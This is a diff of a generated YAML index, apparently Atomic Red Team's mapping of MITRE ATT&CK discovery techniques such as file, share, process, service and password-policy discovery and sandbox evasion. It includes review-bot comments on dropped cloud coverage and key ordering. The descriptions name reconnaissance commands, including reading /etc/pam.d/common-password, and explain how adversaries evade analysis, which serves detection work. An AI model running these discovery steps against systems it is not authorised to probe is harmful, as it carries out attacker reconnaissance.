- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.
+ description: |-
+ Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106).
+ name: File and Directory Discovery
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- File monitoring
- Process monitoring
- Process command-line parameters
- x_mitre_version: '1.2'
- x_mitre_is_subtechnique: false
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
+ x_mitre_system_requirements:
+ - Some folders may require Administrator, SYSTEM or specific user depending
+ on permission levels and access controls
identifier: T1083
atomic_tests:
- name: File and Directory Discovery (cmd.exe)
@@ -40761,13 +45580,7 @@ discovery:
Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039)
can be used to query a remote system for available shared drives using the
net view \\\\remotesystem command. It can also be used to query
- shared drives on the local system using net share.\n\nCloud virtual
- networks may contain remote network shares or file storage services accessible
- to an adversary after they have obtained access to a system. For example,
- AWS, GCP, and Azure support creation of Network File System (NFS) shares and
- Server Message Block (SMB) shares that may be mapped on endpoint or cloud-based
- systems.(Citation: Amazon Creating an NFS File Share)(Citation: Google File
- servers on Compute Engine)"
+ shared drives on the local system using net share."
external_references:
- source_name: mitre-attack
external_id: T1135
@@ -40783,21 +45596,13 @@ discovery:
description: Microsoft. (n.d.). Share a Folder or Drive. Retrieved June 30,
2017.
source_name: TechNet Shared Folder
- - source_name: Amazon Creating an NFS File Share
- url: https://docs.aws.amazon.com/storagegateway/latest/userguide/CreatingAnNFSFileShare.html
- description: Amazon. (n.d.). Creating an NFS File Share. Retrieved October
- 23, 2019.
- - source_name: Google File servers on Compute Engine
- url: https://cloud.google.com/solutions/filers-on-compute-engine
- description: Google Cloud. (2019, October 10). File servers on Compute Engine.
- Retrieved October 23, 2019.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- modified: '2020-03-15T00:59:10.149Z'
+ modified: '2020-10-07T18:10:06.463Z'
created: '2017-12-14T16:46:06.044Z'
x_mitre_is_subtechnique: false
x_mitre_contributors:
@@ -40807,22 +45612,17 @@ discovery:
x_mitre_platforms:
- macOS
- Windows
- - AWS
- - GCP
- - Azure
- Linux
x_mitre_detection: |-
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
-
- In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be sufficient due to benign use during normal operations.
x_mitre_data_sources:
- Process monitoring
- Process command-line parameters
- Network protocol analysis
- Process use of network
- x_mitre_version: '2.1'
+ x_mitre_version: '3.0'
identifier: T1135
atomic_tests:
- name: Network Share Discovery
@@ -41084,7 +45884,7 @@ discovery:
description: |-
Adversaries may attempt to access detailed information about the password policy used within an enterprise network. Password policies for networks are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This would help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
- Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies.(Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies)
+ Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies.(Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies)
external_references:
- source_name: mitre-attack
external_id: T1201
@@ -41103,7 +45903,7 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- modified: '2020-03-26T17:17:42.457Z'
+ modified: '2020-09-29T14:48:07.227Z'
created: '2018-04-18T17:59:24.739Z'
x_mitre_is_subtechnique: false
x_mitre_platforms:
@@ -41123,7 +45923,7 @@ discovery:
- Process monitoring
x_mitre_contributors:
- Sudhanshu Chauhan, @Sudhanshu_C
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
identifier: T1201
atomic_tests:
- name: Examine password complexity policy - Ubuntu
@@ -41279,12 +46079,6 @@ discovery:
atomic_tests: []
T1069:
technique:
- created: '2017-05-31T21:30:55.471Z'
- modified: '2020-03-26T17:48:28.002Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- type: attack-pattern
id: attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Permission Groups Discovery
@@ -41301,6 +46095,12 @@ discovery:
url: https://capec.mitre.org/data/definitions/576.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ modified: '2020-10-08T17:36:01.675Z'
+ created: '2017-05-31T21:30:55.471Z'
x_mitre_is_subtechnique: false
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
@@ -41321,22 +46121,26 @@ discovery:
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
x_mitre_data_sources:
+ - Stackdriver logs
+ - GCP audit logs
+ - AWS CloudTrail logs
- Azure activity logs
- Office 365 account logs
- API monitoring
- Process monitoring
- Process command-line parameters
- x_mitre_version: '2.1'
+ x_mitre_version: '2.2'
atomic_tests: []
T1057:
technique:
- id: attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Process Discovery
- description: |-
- Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
- In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc.
+ created: '2017-05-31T21:30:48.728Z'
+ modified: '2020-03-26T18:05:53.130Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1057
@@ -41344,34 +46148,33 @@ discovery:
- external_id: CAPEC-573
source_name: capec
url: https://capec.mitre.org/data/definitions/573.html
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2020-03-26T18:05:53.130Z'
- created: '2017-05-31T21:30:48.728Z'
- x_mitre_is_subtechnique: false
- x_mitre_system_requirements:
- - Administrator, SYSTEM may provide better process ownership details
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+ description: |-
+ Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
- Normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc.
+ name: Process Discovery
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- API monitoring
- Process monitoring
- Process command-line parameters
- x_mitre_version: '1.2'
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+
+ Normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
+ x_mitre_system_requirements:
+ - Administrator, SYSTEM may provide better process ownership details
+ x_mitre_is_subtechnique: false
identifier: T1057
atomic_tests:
- name: Process Discovery - ps
@@ -41490,9 +46293,21 @@ discovery:
elevation_required: true
T1018:
technique:
- id: attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Remote System Discovery
+ created: '2017-05-31T21:30:28.187Z'
+ modified: '2020-09-17T12:26:53.669Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1018
+ url: https://attack.mitre.org/techniques/T1018
+ - external_id: CAPEC-292
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/292.html
description: "Adversaries may attempt to get a listing of other systems by IP
address, hostname, or other logical identifier on a network that may be used
for Lateral Movement from the current system. Functionality could exist within
@@ -41503,76 +46318,31 @@ discovery:
or /etc/hosts) in order to discover the hostname to IP address
mappings of remote systems. \n\nSpecific to macOS, the bonjour
protocol exists to discover additional Mac-based systems within the same broadcast
- domain.\n\nWithin IaaS (Infrastructure as a Service) environments, remote
- systems include instances and virtual machines in various states, including
- the running or stopped state. Cloud providers have created methods to serve
- information about remote systems, such as APIs and CLIs. For example, AWS
- provides a DescribeInstances API within the Amazon EC2 API and
- a describe-instances command within the AWS CLI that can return
- information about all instances within an account.(Citation: Amazon Describe
- Instances API)(Citation: Amazon Describe Instances CLI) Similarly, GCP's Cloud
- SDK CLI provides the gcloud compute instances list command to
- list all Google Compute Engine instances in a project, and Azure's CLI az
- vm list lists details of virtual machines.(Citation: Google Compute
- Instances)(Citation: Azure VM List)"
- external_references:
- - source_name: mitre-attack
- external_id: T1018
- url: https://attack.mitre.org/techniques/T1018
- - external_id: CAPEC-292
- source_name: capec
- url: https://capec.mitre.org/data/definitions/292.html
- - source_name: Amazon Describe Instances API
- url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
- description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.
- - source_name: Amazon Describe Instances CLI
- url: https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/describe-instances.html
- description: Amazon. (n.d.). describe-instances. Retrieved May 26, 2020.
- - source_name: Google Compute Instances
- url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
- description: Google. (n.d.). gcloud compute instances list. Retrieved May
- 26, 2020.
- - source_name: Azure VM List
- url: https://docs.microsoft.com/en-us/cli/azure/vm?view=azure-cli-latest
- description: Microsoft. (n.d.). az vm. Retrieved May 26, 2020.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2020-05-26T15:02:19.656Z'
- created: '2017-05-31T21:30:28.187Z'
- x_mitre_is_subtechnique: false
- x_mitre_contributors:
- - Praetorian
- - RedHuntLabs, @redhuntlabs
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- - GCP
- - Azure
- - AWS
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
-
- Normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
-
- In cloud environments, the usage of particular commands or APIs to request information about remote systems may be common. Where possible, anomalous usage of these commands and APIs or the usage of these commands and APIs in conjunction with additional unexpected commands may be a sign of malicious use. Logging methods provided by cloud providers that capture history of CLI commands executed or API usage may be utilized for detection.
+ domain."
+ name: Remote System Discovery
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735
+ x_mitre_version: '3.0'
x_mitre_data_sources:
- - Azure activity logs
- - Stackdriver logs
- - AWS CloudTrail logs
- Network protocol analysis
- Process monitoring
- Process use of network
- Process command-line parameters
- x_mitre_version: '2.1'
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+
+ Normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
+ x_mitre_contributors:
+ - RedHuntLabs, @redhuntlabs
+ x_mitre_is_subtechnique: false
identifier: T1018
atomic_tests:
- name: Remote System Discovery - net
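Review bot: The new T1018 entry drops the IaaS description, the GCP/Azure/AWS platforms and the `Azure activity logs`, `Stackdriver logs` and `AWS CloudTrail logs` data sources (removed lines around `x_mitre_platforms` and `x_mitre_data_sources`), so any detection or test mapping built from this index that keyed cloud instance enumeration to T1018 silently loses its technique reference. Since the index is regenerated from upstream ATT&CK, this is presumably an upstream split rather than an intentional coverage drop, but the commit should say where cloud remote-system discovery is now indexed and confirm no atomic test under `atomic_tests:` for T1018 still exercises a cloud CLI against a technique that now lists only Linux/macOS/Windows. The `atomic_tests` list that starts at the last line of the hunk continues outside it, so I cannot verify that from here.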
@@ -41831,10 +46601,13 @@ discovery:
- source_name: mitre-attack
external_id: T1518.001
url: https://attack.mitre.org/techniques/T1518/001
+ - external_id: CAPEC-581
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/581.html
- source_name: Expel IO Evil in AWS
url: https://expel.io/blog/finding-evil-in-aws/
- description: Anthony Randazzo, Britton Manahan and Sam Lipton. (2020, April
- 28). Finding Evil in AWS. Retrieved June 25, 2020.
+ description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
+ Evil in AWS. Retrieved June 25, 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -41850,7 +46623,7 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- modified: '2020-06-29T17:32:24.787Z'
+ modified: '2020-09-16T19:36:16.978Z'
created: '2020-02-21T21:16:18.066Z'
x_mitre_data_sources:
- Stackdriver logs
@@ -41867,7 +46640,7 @@ discovery:
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
In cloud environments, additionally monitor logs for the usage of APIs that may be used to gather information about security software configurations within the environment.
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
@@ -41958,9 +46731,12 @@ discovery:
T1518:
technique:
external_references:
- - external_id: T1518
- source_name: mitre-attack
+ - source_name: mitre-attack
+ external_id: T1518
url: https://attack.mitre.org/techniques/T1518
+ - external_id: CAPEC-580
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/580.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -41974,10 +46750,10 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- modified: '2020-06-29T19:34:39.136Z'
+ modified: '2020-09-16T19:36:17.133Z'
created: '2019-09-16T17:52:44.147Z'
x_mitre_is_subtechnique: false
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
x_mitre_permissions_required:
- User
- Administrator
@@ -42778,9 +47554,21 @@ discovery:
name: powershell
T1007:
technique:
- id: attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: System Service Discovery
+ created: '2017-05-31T21:30:21.315Z'
+ modified: '2020-03-15T01:05:08.805Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1007
+ external_id: T1007
+ - external_id: CAPEC-574
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/574.html
description: Adversaries may try to get information about registered services.
Commands that may obtain information about services using operating system
utilities are "sc," "tasklist /svc" using [Tasklist](https://attack.mitre.org/software/S0057),
@@ -42789,36 +47577,24 @@ discovery:
from [System Service Discovery](https://attack.mitre.org/techniques/T1007)
during automated discovery to shape follow-on behaviors, including whether
or not the adversary fully infects the target and/or attempts specific actions.
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1007
- external_id: T1007
- - external_id: CAPEC-574
- source_name: capec
- url: https://capec.mitre.org/data/definitions/574.html
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2020-03-15T01:05:08.805Z'
- created: '2017-05-31T21:30:21.315Z'
- x_mitre_is_subtechnique: false
- x_mitre_platforms:
- - Windows
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
+ name: System Service Discovery
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
x_mitre_detection: |-
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system information related to services. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- x_mitre_version: '1.1'
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
+ x_mitre_platforms:
+ - Windows
+ x_mitre_is_subtechnique: false
identifier: T1007
atomic_tests:
- name: System Service Discovery
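Review bot: This hunk changes nothing substantive for T1007 — every key (`external_references`, `x_mitre_platforms`, `x_mitre_permissions_required`, `x_mitre_data_sources`, `x_mitre_version`) is removed and re-added in a different order, and the same pattern repeats for T1497.003 and T1497 below. Unstable key order in the generated index makes real changes, such as the data-source removals in the T1018 hunk above, hard to spot in review; if the generator can be told to emit keys in a fixed order (for example a sorted or schema-defined order), the regenerated index would diff only where content actually changed. This is a point about how the index is produced, not about the entry itself, and the `atomic_tests` that follow are outside the hunk.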
@@ -42942,14 +47718,15 @@ discovery:
name: powershell
T1497.003:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1497.003
- url: https://attack.mitre.org/techniques/T1497/003
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Time Based Evasion
+ created: '2020-03-06T21:11:11.225Z'
+ modified: '2020-07-01T16:32:02.532Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
+ id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
description: "Adversaries may employ various time-based methods to detect and
avoid virtualization and analysis environments. This may include timers or
other triggers to avoid a virtual machine environment (VME) or sandbox, specifically
@@ -42960,22 +47737,23 @@ discovery:
Delays may also be based on waiting for specific victim conditions to be met
(ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104)
to avoid analysis and scrutiny. "
- id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2020-07-01T16:32:02.532Z'
- created: '2020-03-06T21:11:11.225Z'
- x_mitre_defense_bypassed:
- - Host forensic analysis
- - Signature-based detection
- - Static File Analysis
- - Anti-virus
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
+ name: Time Based Evasion
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1497.003
+ url: https://attack.mitre.org/techniques/T1497/003
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
x_mitre_detection: 'Time-based evasion will likely occur in the first steps
of an operation but may also occur throughout as an adversary learns the environment.
Data and events should not be viewed in isolation, but as part of a chain
@@ -42985,15 +47763,13 @@ discovery:
implementation and monitoring required. Monitoring for suspicious processes
being spawned that gather a variety of system information or perform other
forms of Discovery, especially in a short period of time, may aid in detection. '
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- x_mitre_contributors:
- - Deloitte Threat Library Team
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Host forensic analysis
+ - Signature-based detection
+ - Static File Analysis
+ - Anti-virus
atomic_tests: []
T1497.002:
technique:
@@ -43072,19 +47848,15 @@ discovery:
atomic_tests: []
T1497:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1497
- url: https://attack.mitre.org/techniques/T1497
- - source_name: Unit 42 Pirpi July 2015
- url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
- description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
- on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
- 23, 2019.'
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Virtualization/Sandbox Evasion
+ created: '2019-04-17T22:22:24.505Z'
+ modified: '2020-07-01T16:32:02.272Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
+ id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
description: "Adversaries may employ various means to detect and avoid virtualization
and analysis environments. This may include changing behaviors based on the
results of checks for the presence of artifacts indicative of a virtual machine
@@ -43101,16 +47873,35 @@ discovery:
if it is in an analysis environment. Additional methods include use of sleep
timers or loops within malware code to avoid operating within a temporary
sandbox.(Citation: Unit 42 Pirpi July 2015)\n\n"
- id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2020-07-01T16:32:02.272Z'
- created: '2019-04-17T22:22:24.505Z'
- x_mitre_version: '1.2'
+ name: Virtualization/Sandbox Evasion
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1497
+ url: https://attack.mitre.org/techniques/T1497
+ - source_name: Unit 42 Pirpi July 2015
+ url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+ description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+ on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+ 23, 2019.'
+ x_mitre_is_subtechnique: false
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host forensic analysis
+ - Signature-based detection
+ - Static File Analysis
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_data_sources:
+ - Process monitoring
+ - Process command-line parameters
x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
techniques will likely occur in the first steps of an operation but may also
occur throughout as an adversary learns the environment. Data and events should
@@ -43121,22 +47912,3027 @@ discovery:
required. Monitoring for suspicious processes being spawned that gather a
variety of system information or perform other forms of Discovery, especially
in a short period of time, may aid in detection.
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_contributors:
- - Deloitte Threat Library Team
- - Sunny Neo
- x_mitre_defense_bypassed:
- - Anti-virus
- - Host forensic analysis
- - Signature-based detection
